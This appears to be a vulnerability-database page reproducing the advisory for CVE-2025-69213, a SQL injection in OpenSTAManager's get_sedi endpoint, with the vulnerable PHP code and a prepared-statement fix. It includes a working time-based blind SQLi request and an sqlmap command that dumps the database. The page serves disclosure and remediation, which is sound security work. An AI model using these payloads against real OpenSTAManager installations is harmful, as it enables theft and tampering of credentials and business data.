8.7

CVSS Score

4.0

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-69213

CVE-2025-69213: OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28

case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Data Flow

Source: $_GET['idanagrafica'] → get('idanagrafica')
Vulnerable: User input concatenated directly into SQL query with single quotes
Sink: $dbo->fetchArray($q) executes the malicious query

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12

Impact

Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
Privilege Escalation: Modification of zz_users table to gain admin access
Data Integrity: Unauthorized modification or deletion of records
Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

OpenSTAManager: Verified in latest version (as of December 2025)
All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

After:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Credit

Discovered by: Łukasz Rybak

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-69213

CVE-2025-69213:

8.7

CVSS Score

4.0

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
devcode-it/openstamanager	composer	<= 2.9.8

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis:

In progress

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

8.7

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-69213: OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Summary

Proof of Concept

Vulnerable Code

Data Flow

Exploit

Impact

Affected Versions

Remediation

Credit

CVE-2025-69213:

8.7

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

8.7

8.7

Technical Details

Vulnerability IntelligenceMiggo AI

CVE-2025-69213: OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Summary

Proof of Concept

Vulnerable Code

Data Flow

Exploit

Impact

Affected Versions

Remediation

Credit

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI